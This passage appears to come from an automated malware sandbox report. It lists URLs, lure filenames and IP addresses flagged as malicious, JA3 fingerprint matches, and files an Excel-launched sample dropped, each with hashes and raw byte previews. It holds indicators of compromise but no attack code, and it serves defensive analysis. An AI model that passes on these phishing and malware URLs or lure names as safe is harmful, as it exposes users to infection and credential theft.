                https://kingfenceny.1kcloud.com/edlv_3zGFs/#0Get hashmaliciousBrowse
                • 188.40.18.222
                https://kingfenceny.1kcloud.com/edlv_3zGFs/#0Get hashmaliciousBrowse
                • 188.40.18.222
                DFR2154747.vbeGet hashmaliciousBrowse
                • 136.243.172.101
                promet2Get hashmaliciousBrowse
                • 88.198.246.242
                WZJIuy3UYm.exeGet hashmaliciousBrowse
                • 95.217.228.176
                COO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                • 195.201.225.248
                https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                • 138.201.9.137
                http://search.hwatchtvnow.coGet hashmaliciousBrowse
                • 116.202.46.88
                https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                • 138.201.9.137
                f_026dfd.exeGet hashmaliciousBrowse
                • 49.12.121.47
                UNIFIEDLAYER-AS-1US______.docGet hashmaliciousBrowse
                • 192.185.151.24
                ______.docGet hashmaliciousBrowse
                • 192.185.151.24
                http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20=Get hashmaliciousBrowse
                • 162.241.175.181
                http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.comGet hashmaliciousBrowse
                • 50.87.150.0
                https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeGGet hashmaliciousBrowse
                • 162.241.127.190
                https://cypressbayhockey.com/NOGet hashmaliciousBrowse
                • 192.185.120.89
                https://pdfsharedmessage.xtensio.com/7wtcdltaGet hashmaliciousBrowse
                • 108.179.246.23
                form.docGet hashmaliciousBrowse
                • 162.241.148.243
                RFQPO90865802ICONME.exeGet hashmaliciousBrowse
                • 192.185.131.105
                Ekz Payment.htmGet hashmaliciousBrowse
                • 192.185.196.146
                http://moneypay.best/Get hashmaliciousBrowse
                • 192.232.250.4
                https://canningelectricinc.wordpress.com/Get hashmaliciousBrowse
                • 192.185.188.96
                Lmcgrath - FAX_ALNRSUW.htmlGet hashmaliciousBrowse
                • 192.185.29.156
                Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                • 108.167.141.199
                W08347.exeGet hashmaliciousBrowse
                • 192.185.117.218
                https://datetheright1.com/damn/sharepoint%20newGet hashmaliciousBrowse
                • 162.144.40.98
                http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/Get hashmaliciousBrowse
                • 162.241.101.253
                8G9b9FXspm.exeGet hashmaliciousBrowse
                • 162.241.219.113
                Nuevo pedido.exeGet hashmaliciousBrowse
                • 192.185.131.105
                PO #000941.exeGet hashmaliciousBrowse
                • 162.241.216.233

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                05af1f5ca1b87cc9cc9b25185115607d______.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                ______.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                OKU-010920 SCQ-220920.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                JI35907_2020.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                info.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Info.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                documents.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                spetsifikatsiya.xlsGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Shipping Document PL and BL003534.pptGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Payment Documents.xlsGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                6Cprm97UTl.xlsGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                DAT 2020_12_30.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                PSX7103491.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Beauftragung.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                1I72L29IL3F.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                Adjunto_2021.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248
                #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                • 104.18.58.219
                • 104.22.1.232
                • 195.201.225.248

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\AppData\LocalLow\sqlite3.dllCOO_TPE0269320_image2020-12-31-055841.exeGet hashmaliciousBrowse
                  sek750_2021.exeGet hashmaliciousBrowse
                    0I2ddZZKv7.exeGet hashmaliciousBrowse
                      Q2BZ01fmwK.exeGet hashmaliciousBrowse
                        fiUdG0AFun.exeGet hashmaliciousBrowse
                          sU0m70ahcm.exeGet hashmaliciousBrowse
                            vDKnVBINrY.exeGet hashmaliciousBrowse
                              HOJAsmBUjl.exeGet hashmaliciousBrowse
                                FwkgiBlwcg.exeGet hashmaliciousBrowse
                                  0XxTmF8pEW.exeGet hashmaliciousBrowse
                                    uMtPsgsHU2.exeGet hashmaliciousBrowse
                                      ZJaczSqbMl.exeGet hashmaliciousBrowse
                                        53CmqAXIHb.exeGet hashmaliciousBrowse
                                          VWOhpUmgcP.exeGet hashmaliciousBrowse
                                            S5N3DvtQ0h.exeGet hashmaliciousBrowse
                                              q7ryNCLGYT.exeGet hashmaliciousBrowse
                                                rZ28UGXv3X.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exeGet hashmaliciousBrowse
                                                      530ppafC4x.exeGet hashmaliciousBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):77824
                                                        Entropy (8bit):1.1340767975888557
                                                        Encrypted:false
                                                        SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                                        MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                                        SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                                        SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                                        SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                                        Malicious:false
                                                        Preview: SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                        Category:dropped
                                                        Size (bytes):58936
                                                        Entropy (8bit):7.994797855729196
                                                        Encrypted:true
                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                        Malicious:false
                                                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):893
                                                        Entropy (8bit):7.366016576663508
                                                        Encrypted:false
                                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                        Malicious:false
                                                        Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):326
                                                        Entropy (8bit):3.1121144470001534
                                                        Encrypted:false
                                                        SSDEEP:6:kKpAFwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:mykPlE99SNxAhUegeT2
                                                        MD5:245D002CE8629C434AA6D1ABBC88246E
                                                        SHA1:4BD8B6059AE578468BF700C2848F5D6F24475CB6
                                                        SHA-256:EC375FD4940F7DFF765BB2183318499C4CB078C7FF05831052550834AD1DEADC
                                                        SHA-512:24E95C9D034B9A6480C2989582AF0835CEF463340E51104A123E63FBAEE9B0B67DC783FB86FA8A9C6F24FCC8259A31B65B08030DF87676FA9F1C2A54F71482CF
                                                        Malicious:false
                                                        Preview: p...... .........Ku.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):252
                                                        Entropy (8bit):3.0215269645321685
                                                        Encrypted:false
                                                        SSDEEP:3:kkFklCwJNl/tfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKPmRliBAIdQZV7eAYLit
                                                        MD5:F541E4217A2CBE51440A4BA11A78F387
                                                        SHA1:1B37FCF58B5F607D761A4BCAEE4556A913E574CC
                                                        SHA-256:A35B8C5CD442FB4486F2A8782176D2CBBF2ADF45D9B97AFA66E718E76289CC75
                                                        SHA-512:943F0026126E8763D5882FD05AAC609D2274CF313B952B2D5D096BEBEA85C18FDED81968F3CBDB5EEAD12DAAAE05D7E2F2FB93DD54D3525FC7F28DFB36C5C860
                                                        Malicious:false
                                                        Preview: p...... ....`....B......(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                        C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.7798653713156546
                                                        Encrypted:false
                                                        SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                        MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                        SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                        SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                        SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                        Malicious:false
                                                        Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):916735
                                                        Entropy (8bit):6.514932604208782
                                                        Encrypted:false
                                                        SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                        MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                        SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                        SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                        SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: COO_TPE0269320_image2020-12-31-055841.exe, Detection: malicious, Browse
                                                        • Filename: sek750_2021.exe, Detection: malicious, Browse
                                                        • Filename: 0I2ddZZKv7.exe, Detection: malicious, Browse
                                                        • Filename: Q2BZ01fmwK.exe, Detection: malicious, Browse
                                                        • Filename: fiUdG0AFun.exe, Detection: malicious, Browse
                                                        • Filename: sU0m70ahcm.exe, Detection: malicious, Browse
                                                        • Filename: vDKnVBINrY.exe, Detection: malicious, Browse
                                                        • Filename: HOJAsmBUjl.exe, Detection: malicious, Browse
                                                        • Filename: FwkgiBlwcg.exe, Detection: malicious, Browse
                                                        • Filename: 0XxTmF8pEW.exe, Detection: malicious, Browse
                                                        • Filename: uMtPsgsHU2.exe, Detection: malicious, Browse
                                                        • Filename: ZJaczSqbMl.exe, Detection: malicious, Browse
                                                        • Filename: 53CmqAXIHb.exe, Detection: malicious, Browse
                                                        • Filename: VWOhpUmgcP.exe, Detection: malicious, Browse
                                                        • Filename: S5N3DvtQ0h.exe, Detection: malicious, Browse
                                                        • Filename: q7ryNCLGYT.exe, Detection: malicious, Browse
                                                        • Filename: rZ28UGXv3X.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exe, Detection: malicious, Browse
                                                        • Filename: SecuriteInfo.com.BehavesLike.Win32.Trojan.gc.exe, Detection: malicious, Browse
                                                        • Filename: 530ppafC4x.exe, Detection: malicious, Browse
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                        C:\Users\user\AppData\Local\Temp\741F0000
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):265254
                                                        Entropy (8bit):7.974700866105644
                                                        Encrypted:false
                                                        SSDEEP:6144:nrDk/RQb44UWE035WaNeoYOcAYiyJTs9Q8yWz:nnLxUWGaNesYbTH8yq
                                                        MD5:0486A5D5BC90F4A9CDFE127660C9C324
                                                        SHA1:D92C02486FB7718F44CADD647B0FA01CF32DAE9F
                                                        SHA-256:6AA194CFD6889FD8F6BB56520EA3D5C9A80E01E939DCC3AF1FD80D3649F332AF
                                                        SHA-512:814EB1B5142BB4AF632233CB5629EE4F6E0A8A4DEC10DA7DF33D89EB3F6C4B6102C638098BFCA318BEE88A4BB549E90C87F7403D7D3BAD92B711CF78B08CDEA8
                                                        Malicious:false
                                                        Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Local\Temp\Cab6613.tmp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                        Category:dropped
                                                        Size (bytes):58936
                                                        Entropy (8bit):7.994797855729196
                                                        Encrypted:true
                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                        Malicious:false
                                                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                        C:\Users\user\AppData\Local\Temp\Tar6614.tmp
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):152533
                                                        Entropy (8bit):6.31602258454967
                                                        Encrypted:false
                                                        SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                        MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                        SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                        SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                        SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                        Malicious:false
                                                        Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jan 8 16:05:56 2021, atime=Fri Jan 8 16:05:56 2021, length=8192, window=hide
                                                        Category:dropped
                                                        Size (bytes):867
                                                        Entropy (8bit):4.489503739489606
                                                        Encrypted:false
                                                        SSDEEP:12:85QMCLgXg/XAlCPCHaX5B8zDXB/h8X+WnicvbUbDtZ3YilMMEpxRljKGwyTdJP9O:85LU/XTp6zLcYe0Dv3qHwqrNru/
                                                        MD5:1AF82EB593899CBB3FE4C0A5963DB3CE
                                                        SHA1:2FD54A6ED91E337FECF797A8AA84C94CB85E5B9E
                                                        SHA-256:6C968B89F756B291AA577E52DA6B094932C5449F652AF331289FC0F866CDCE64
                                                        SHA-512:3348A5E9D0980CD5AC39791B1AACEAE44E6F3C1EB706DD90AEB359EA031048BA8C04A6507E565991E66A9F90A77D73D0D8C59375C84455234B70FDB36E6DA33D
                                                        Malicious:false
                                                        Preview: L..................F...........7G..@.t.....@.t...... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....(R....Desktop.d......QK.X(R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):83
                                                        Entropy (8bit):4.42866744313446
                                                        Encrypted:false
                                                        SSDEEP:3:oyBVomMUVnRJpSIJdnRJpSmMUVnRJpSv:dj6MnxfdnxEMnxc
                                                        MD5:ABFBBA964FE194830991FC3EDDE3FB4A
                                                        SHA1:7E2AD416D70C53F0E3A6C31035D55C670D70A57E
                                                        SHA-256:D855D7448592A8D2F464D582E53D2346D55F3E09F765D2CC18229B09BF3EBA90
                                                        SHA-512:D647981A3C6787C6F6DBFCED8F20F7B42BB420C6DE38C005A2B22174CD66692254271B669EF79C4691ED3F9AAE796E13D15EC7E145BCE4BC1ABA5B804DA5D409
                                                        Malicious:false
                                                        Preview: Desktop.LNK=0..[xls]..ul9kpUwYel.LNK=0..ul9kpUwYel.LNK=0..[xls]..ul9kpUwYel.LNK=0..
                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ul9kpUwYel.LNK
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:24 2020, mtime=Fri Jan 8 16:05:56 2021, atime=Fri Jan 8 16:05:56 2021, length=289280, window=hide
                                                        Category:dropped
                                                        Size (bytes):2028
                                                        Entropy (8bit):4.521373297611859
                                                        Encrypted:false
                                                        SSDEEP:48:85q/XTgzLZGhZnHTQh25q/XTgzLZGhZnHTQ/:8A/X8zLZaRHTQh2A/X8zLZaRHTQ/
                                                        MD5:4C6C05FC98365660BEFCC68B5251A03A
                                                        SHA1:053431E4A2C81C6AF52E24F3DF897999F033F663
                                                        SHA-256:9100D1D9AD54608B6C427B1610E7CD548F56325AD46DDD05F3DE97E6A031EA2F
                                                        SHA-512:A6DFEE4C7A1A04627EE1718A921754B1AA3088BA25FCD361F41D1D0FFBB7CD6CBAAAB260A7B873A428FA9A57393D6C5D8E0B5E55196DB87BAD3D8485B5E04AF2
                                                        Malicious:false
